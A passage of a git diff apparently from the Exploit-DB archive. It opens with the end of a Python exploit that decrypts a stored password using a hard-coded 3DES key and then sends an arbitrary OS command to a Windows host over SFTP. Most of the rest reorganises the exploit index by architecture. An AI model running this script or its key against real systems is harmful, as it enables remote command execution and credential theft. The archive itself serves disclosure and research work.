    a = struct.pack('i', int(changeset_id[0].text))  # 32
    b = struct.pack('h', int(changeset_id[1].text))  # 16
    c = struct.pack('h', int(changeset_id[2].text))  # 16
    d = struct.pack('B', int(changeset_id[3].text))  # 8
    e = struct.pack('B', int(changeset_id[4].text))  # 8
    f = struct.pack('B', int(changeset_id[5].text))  # 8
    g = struct.pack('B', int(changeset_id[6].text))  # 8
    h = struct.pack('B', int(changeset_id[7].text))  # 8
    i = struct.pack('B', int(changeset_id[8].text))  # 8
    j = struct.pack('B', int(changeset_id[9].text))  # 8
    k = struct.pack('B', int(changeset_id[10].text)) # 8
    x = a + b + c + d + e + f + g + h + i + j + k
    return uuid.UUID(bytes_le=x)
 def get_uuid(sftp):
    res = send_request(sftp, get_server_info)
    if res[0] != 201:
        print('[!] Error could not request server info via SFTP')
        sys.exit(1)
    res = b64decode(res[1].get_string()).decode('utf-8')
    res = ET.fromstring(res)
    changeset_id = res.find('.//SyncChangeSetID')
    uuid = convert_changeset_id_to_uuid(changeset_id)
    return str(uuid)
 def login(host, port, user, password):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(host, port, user, password, look_for_keys=False)
    return ssh.open_sftp()
 def send_command(sftp, cmd):
    uuid = get_uuid(sftp)
    payload = prepare_update_config(uuid, cmd)
    res = send_request(sftp, payload)
    if res[0] != 201:
        print('[!] Error could not send update config request via SFTP')
        sys.exit(1)
 def decrypt_password(password):
  key = b64decode('HKVV76GdVuzXne/zxtWvdjA2d2Am548E')
  iv = b64decode('gVGow/9uLvM=')
  encrypted = b64decode(password)
  cipher = DES3.new(key=key, iv=iv, mode=DES3.MODE_CBC)
  decrypted = cipher.decrypt(encrypted)
  return unpad(decrypted, 8).decode('utf-16')
 if len(sys.argv) != 6:
    print('[!] Missing arguments')
    print('[ ] Usage: {} <target> <port> <username> <encrypted-password> <cmd>'.format(sys.argv[0]))
    print("[ ] E.g. {} 192.168.1.128 14983 admin DEomw27OY7sYZs4XjYA2kVB4LEB5skN4 'whoami > C:\\x.txt'".format(sys.argv[0]))
    sys.exit(1)
 target = sys.argv[1]
 port = int(sys.argv[2])
 username = sys.argv[3]
 password = sys.argv[4]
 cmd = sys.argv[5]
 print('[ ] Decrypting password')
 password = decrypt_password(password)
 print('[ ] Decrypted password is "{}"'.format(password))
 print('[ ] Logging in')
 sftp = login(target, port, username, password)
 print('[ ] Sending command')
 send_command(sftp, cmd)
 print('[ ] Command successfully sent, triggering...')
 sftp = login(target, port, username, password)
--- a/exploits/windows_x86-64/dos/47393.txt
+++ b/exploits/windows_x86-64/dos/47393.txt
--- a/exploits/windows_x86-64/dos/47525.txt
+++ b/exploits/windows_x86-64/dos/47525.txt
--- a/exploits/windows_x86-64/local/43139.c
+++ b/exploits/windows_x86-64/local/43139.c
--- a/exploits/windows_x86-64/local/45738.py
+++ b/exploits/windows_x86-64/local/45738.py
--- a/exploits/windows_x86-64/local/47122.py
+++ b/exploits/windows_x86-64/local/47122.py
--- a/exploits/windows_x86-64/local/47170.c
+++ b/exploits/windows_x86-64/local/47170.c
--- a/exploits/windows_x86-64/remote/44275.txt
+++ b/exploits/windows_x86-64/remote/44275.txt
--- a/exploits/windows_x86/local/38457.c
+++ b/exploits/windows_x86/local/38457.c
--- a/exploits/windows_x86/local/42432.cpp
+++ b/exploits/windows_x86/local/42432.cpp
--- a/exploits/windows_x86/local/42930.txt
+++ b/exploits/windows_x86/local/42930.txt
--- a/exploits/windows_x86/local/43366.md
+++ b/exploits/windows_x86/local/43366.md
--- a/exploits/windows_x86/local/46507.py
+++ b/exploits/windows_x86/local/46507.py
--- a/exploits/windows_x86/local/46918.txt
+++ b/exploits/windows_x86/local/46918.txt
--- a/exploits/windows_x86/local/47176.cpp
+++ b/exploits/windows_x86/local/47176.cpp
--- a/exploits/windows_x86/local/48314.py
+++ b/exploits/windows_x86/local/48314.py
--- a/exploits/windows_x86/local/48352.txt
+++ b/exploits/windows_x86/local/48352.txt
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6579,7 +6579,7 @@ id,file,description,date,author,type,platform,port
 47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows,
 47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows,
 47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows,
-47393,exploits/windows/dos/47393.txt,"Notepad++ < 7.7 (x64)  - Denial of Service",2019-09-16,"Bogdan Kurinnoy",dos,windows,
+47393,exploits/windows_x86-64/dos/47393.txt,"Notepad++ < 7.7 (x64)  - Denial of Service",2019-09-16,"Bogdan Kurinnoy",dos,windows_x86-64,
 47404,exploits/watchos/dos/47404.pl,"SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service",2019-09-20,"Emilio Revelo",dos,watchos,
 47406,exploits/watchos/dos/47406.py,"InputMapper 1.6.10 - Denial of Service",2019-09-23,elkoyote07,dos,watchos,
 47410,exploits/windows/dos/47410.py,"DeviceViewer 3.12.0.1 - 'creating user' Denial of Service",2019-09-24,x00pwn,dos,windows,
@ -6602,7 +6602,7 @@ id,file,description,date,author,type,platform,port
 47489,exploits/windows/dos/47489.txt,"Microsoft Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
 47494,exploits/windows/dos/47494.py,"SpotAuditor 5.3.1.0 - Denial of Service",2019-10-14,"Sanjana shetty",dos,windows,
 47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows,
-47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows,
+47525,exploits/windows_x86-64/dos/47525.txt,"WinRAR 5.80 (x64) - Denial of Service",2019-10-21,alblalawi,dos,windows_x86-64,
 47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows,
 47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple,
 47563,exploits/windows/dos/47563.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service",2019-10-30,"Nithoshitha S",dos,windows,
@ -10032,7 +10032,7 @@ id,file,description,date,author,type,platform,port
 40025,exploits/linux/local/40025.py,"HNB 1.9.18-10 - Local Buffer Overflow",2016-06-27,"Juan Sacco",local,linux,
 40039,exploits/windows_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)",2016-06-29,blomster81,local,windows_x86,
 40040,exploits/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,local,windows,
-40049,exploits/linux_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,local,linux_x86-64,
+40049,exploits/linux_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation",2016-07-03,vnik,local,linux_x86-64,
 40066,exploits/android/local/40066.txt,"Samsung Android JACK - Local Privilege Escalation",2016-07-06,"Google Security Research",local,android,
 40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",local,windows,
 40071,exploits/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Local Privilege Escalation",2016-07-08,sh4d0wman,local,windows,
@ -10204,7 +10204,7 @@ id,file,description,date,author,type,platform,port
 41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",local,windows,
 41619,exploits/windows/local/41619.txt,"Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows,
 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
-43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows,
+43366,exploits/windows_x86/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows_x86,
 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
 43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'NamedObj ' Kernel Loader",2017-12-27,Specter,local,hardware,
 43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
@ -10342,7 +10342,7 @@ id,file,description,date,author,type,platform,port
 42425,exploits/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows,
 42426,exploits/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows,
 42429,exploits/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,local,windows,
-42432,exploits/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,local,windows,
+42432,exploits/windows_x86/local/42432.cpp,"Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,local,windows_x86,
 42435,exploits/windows_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,local,windows_x86-64,
 42454,exploits/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Local Privilege Escalation",2017-08-14,Securify,local,macos,
 42455,exploits/windows/local/42455.py,"ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,local,windows,
@ -10373,7 +10373,7 @@ id,file,description,date,author,type,platform,port
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
 42921,exploits/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow",2017-09-29,"Touhid M.Shaikh",local,windows,
-42930,exploits/windows/local/42930.txt,"Microsoft Word 2007 (x86) - Information Disclosure",2017-09-30,"Eduardo Braun Prado",local,windows,
+42930,exploits/windows_x86/local/42930.txt,"Microsoft Word 2007 (x86) - Information Disclosure",2017-09-30,"Eduardo Braun Prado",local,windows_x86,
 42936,exploits/linux/local/42936.md,"UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation",2017-10-02,Sysdream,local,linux,
 42937,exploits/linux/local/42937.md,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,local,linux,
 42948,exploits/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",local,osx,
@ -10391,7 +10391,7 @@ id,file,description,date,author,type,platform,port
 43109,exploits/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Local Privilege Escalation",2017-11-01,"Parvez Anwar",local,windows,
 43127,exploits/linux/local/43127.c,"Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP/Chrome Sandbox Privilege Escalation",2017-11-06,"Chris Salls",local,linux,
 43134,exploits/windows/local/43134.c,"Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass",2017-11-10,hyp3rlinx,local,windows,
-43139,exploits/windows/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation",2017-11-13,"Parvez Anwar",local,windows,
+43139,exploits/windows_x86-64/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation",2017-11-13,"Parvez Anwar",local,windows_x86-64,
 43156,exploits/windows/local/43156.py,"VX Search 10.2.14 - 'Proxy' Local Buffer Overflow (SEH)",2017-11-16,wetw0rk,local,windows,
 43162,exploits/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",local,windows,
 43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,local,windows,
@ -10430,7 +10430,7 @@ id,file,description,date,author,type,platform,port
 44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
 44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader",2016-04-27,"Carlos Pizarro",local,hardware,
 44224,exploits/windows/local/44224.py,"iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow",2018-03-02,ScrR1pTK1dd13,local,windows,
-38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows,
+38457,exploits/windows_x86/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows_x86,
 44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
 44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos,
 44239,exploits/osx/local/44239.md,"Apple OS X 10.10.5 - 'rootsh' Local Privilege Escalation",2016-05-16,"Brandon Azad",local,osx,
@ -10445,9 +10445,9 @@ id,file,description,date,author,type,platform,port
 44279,exploits/linux/local/44279.py,"SC 7.16 - Stack-Based Buffer Overflow",2018-03-12,"Juan Sacco",local,linux,
 44282,exploits/hardware/local/44282.txt,"Sony Playstation 4 (PS4) 4.55 < 5.50 - WebKit Code Execution (PoC)",2018-03-10,qwertyoruiop,local,hardware,
 44298,exploits/linux/local/44298.c,"Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation",2018-03-16,"Bruce Leidl",local,linux,
-44299,exploits/linux/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2015-08-26,"Vitaly Nikolenko",local,linux,
+44299,exploits/linux_x86-64/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2015-08-26,"Vitaly Nikolenko",local,linux_x86-64,
-44300,exploits/linux/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation",2016-07-04,"Vitaly Nikolenko",local,linux,
+44300,exploits/linux_x86-64/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation",2016-07-04,"Vitaly Nikolenko",local,linux_x86-64,
-44302,exploits/linux/local/44302.c,"Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation",2017-10-16,"Jeremy Huang",local,linux,
+44302,exploits/linux_x86-64/local/44302.c,"Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation",2017-10-16,"Jeremy Huang",local,linux_x86-64,
 44303,exploits/linux/local/44303.c,"Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation",2017-12-11,anonymous,local,linux,
 44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware,
 44307,exploits/macos/local/44307.m,"Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation",2018-03-20,"Google Security Research",local,macos,
@ -10511,7 +10511,7 @@ id,file,description,date,author,type,platform,port
 44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows,
 46070,exploits/windows_x86/local/46070.py,"Ayukov NFTP FTP Client 2.0 - Buffer Overflow",2019-01-02,"Uday Mittal",local,windows_x86,
 44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows,
-44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution",2018-05-21,smgorelik,local,windows,
+44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Execution",2018-05-21,smgorelik,local,windows,
 44742,exploits/windows/local/44742.txt,"Flash ActiveX 18.0.0.194 - Code Execution",2018-02-13,smgorelik,local,windows,
 44743,exploits/windows/local/44743.html,"Microsoft Internet Explorer 11 - javascript Code Execution",2016-02-01,checkpoint,local,windows,
 44744,exploits/windows/local/44744.txt,"Flash ActiveX 28.0.0.137 - Code Execution (1)",2016-02-16,smgorelik,local,windows,
@ -10621,7 +10621,7 @@ id,file,description,date,author,type,platform,port
 45501,exploits/windows/local/45501.txt,"EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation",2018-09-27,"Osanda Malith Jayathissa",local,windows,
 45503,exploits/windows_x86-64/local/45503.txt,"PCProtect 4.8.35 - Privilege Escalation",2018-09-28,"Hashim Jawad",local,windows_x86-64,
 45505,exploits/windows_x86/local/45505.py,"Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)",2018-10-01,SPARC,local,windows_x86,
-45516,exploits/linux/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux,
+45516,exploits/linux_x86-64/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux_x86-64,
 45528,exploits/linux/local/45528.txt,"virtualenv 16.0.0 - Sandbox Escape",2018-10-04,vr_system,local,linux,
 45531,exploits/windows_x86/local/45531.py,"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass)",2018-10-04,"Miguel Mendez Z",local,windows_x86,
 45548,exploits/linux/local/45548.txt,"Git Submodule - Arbitrary Code Execution (PoC)",2018-10-05,"Junio C Hamano",local,linux,
@ -10648,7 +10648,7 @@ id,file,description,date,author,type,platform,port
 45709,exploits/windows_x86-64/local/45709.vb,"School Equipment Monitoring System 1.0 - 'login' SQL Injection",2018-10-29,"Ihsan Sencan",local,windows_x86-64,
 45710,exploits/windows_x86/local/45710.pl,"Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)",2018-10-29,"Kağan Çapar",local,windows_x86,
 45715,exploits/linux/local/45715.txt,"systemd - 'chown_one()' Dereference Symlinks",2018-10-29,"Google Security Research",local,linux,
-45738,exploits/windows/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows,
+45738,exploits/windows_x86-64/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows_x86-64,
 45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd,
 45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows,
 45765,exploits/windows/local/45765.txt,"Anviz AIM CrossChex Standard 4.3 - CSV Injection",2018-11-02,LiquidWorm,local,windows,
@ -10720,7 +10720,7 @@ id,file,description,date,author,type,platform,port
 46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows,
 46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows,
 46241,exploits/linux/local/46241.rb,"AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)",2019-01-24,Metasploit,local,linux,
-46249,exploits/linux/local/46249.py,"MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation",2019-01-28,d7x,local,linux,
+46249,exploits/linux_x86/local/46249.py,"MySQL User-Defined (Linux) (x86) - 'sys_exec' Local Privilege Escalation",2019-01-28,d7x,local,linux_x86,
 46255,exploits/windows/local/46255.py,"Easy Video to iPod Converter 1.6.20 - Buffer Overflow (SEH)",2019-01-28,"Nawaf Alkeraithe",local,windows,
 46265,exploits/windows/local/46265.py,"R 3.4.4 XP SP3 - Buffer Overflow (Non SEH)",2019-01-28,"Dino Covotsos",local,windows,
 46267,exploits/windows/local/46267.py,"BEWARD Intercom 2.3.1 - Credentials Disclosure",2019-01-28,LiquidWorm,local,windows,
@ -10746,7 +10746,7 @@ id,file,description,date,author,type,platform,port
 46428,exploits/macos/local/46428.m,"Apple macOS 10.13.5 - Local Privilege Escalation",2019-02-13,Synacktiv,local,macos,
 46479,exploits/windows/local/46479.txt,"Cisco WebEx Meetings < 33.6.6 / < 33.9.1 - Privilege Escalation",2019-03-01,SecureAuth,local,windows,
 46437,exploits/windows/local/46437.txt,"Memu Play 6.0.7 - Privilege Escalation",2019-02-21,"Alejandra Sánchez",local,windows,
-46507,exploits/windows/local/46507.py,"Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)",2019-03-07,Hodorsec,local,windows,
+46507,exploits/windows_x86/local/46507.py,"Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)",2019-03-07,Hodorsec,local,windows_x86,
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,
 46522,exploits/hardware/local/46522.md,"Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)",2019-03-08,Specter,local,hardware,
 46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows,
@ -10803,10 +10803,10 @@ id,file,description,date,author,type,platform,port
 46879,exploits/solaris/local/46879.c,"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",2019-05-20,"Marco Ivaldi",local,solaris,
 47147,exploits/linux/local/47147.txt,"Docker - Container Escape",2019-07-19,dominikczarnotatob,local,linux,
 46916,exploits/windows/local/46916.txt,"Microsoft Windows 10 (17763.379) - Install DLL",2019-05-23,SandboxEscaper,local,windows,
-46917,exploits/windows/local/46917.txt,"Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
+46917,exploits/windows/local/46917.txt,"Microsoft Windows (x86/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
 46912,exploits/windows/local/46912.txt,"Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation",2019-05-23,"Google Security Research",local,windows,
 46914,exploits/macos/local/46914.rb,"Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)",2019-05-23,Metasploit,local,macos,
-46918,exploits/windows/local/46918.txt,"Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
+46918,exploits/windows_x86/local/46918.txt,"Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows_x86,
 46919,exploits/windows/local/46919.txt,"Microsoft Internet Explorer 11 - Sandbox Escape",2019-05-22,SandboxEscaper,local,windows,
 46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,Arch-Vile,local,windows,
 46922,exploits/windows/local/46922.py,"Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow",2019-05-24,"Uday Mittal",local,windows,
@ -10832,7 +10832,7 @@ id,file,description,date,author,type,platform,port
 47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows,
 47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,
 47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows,
-47122,exploits/windows/local/47122.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)",2019-07-16,blackleitus,local,windows,
+47122,exploits/windows_x86-64/local/47122.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)",2019-07-16,blackleitus,local,windows_x86-64,
 47126,exploits/windows/local/47126.py,"DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)",2019-07-16,"Xavi Beltran",local,windows,
 47128,exploits/windows/local/47128.rb,"Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)",2019-07-16,Metasploit,local,windows,
 47133,exploits/linux/local/47133.txt,"Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME",2019-07-17,"Google Security Research",local,linux,
@ -10846,13 +10846,13 @@ id,file,description,date,author,type,platform,port
 47167,exploits/linux/local/47167.sh,"Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)",2019-01-04,bcoles,local,linux,
 47168,exploits/linux/local/47168.c,"Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation",2018-12-29,bcoles,local,linux,
 47169,exploits/linux/local/47169.c,"Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)",2018-12-29,bcoles,local,linux,
-47170,exploits/linux/local/47170.c,"Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2018-12-29,bcoles,local,linux,
+47170,exploits/windows_x86-64/local/47170.c,"Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation",2018-12-29,bcoles,local,windows_x86-64,
 47171,exploits/multiple/local/47171.sh,"VMware Workstation/Player < 12.5.5 - Local Privilege Escalation",2018-12-30,bcoles,local,multiple,
 47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,
 47175,exploits/multiple/local/47175.sh,"Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation",2018-12-30,bcoles,local,multiple,
 47173,exploits/multiple/local/47173.sh,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)",2019-01-13,bcoles,local,multiple,
 47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
-47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
+47176,exploits/windows_x86/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows_x86,
 47197,exploits/multiple/local/47197.rb,"SilverSHielD 6.x - Local Privilege Escalation",2019-08-01,"Ian Bredemeyer",local,multiple,
 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
@ -11075,7 +11075,7 @@ id,file,description,date,author,type,platform,port
 48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
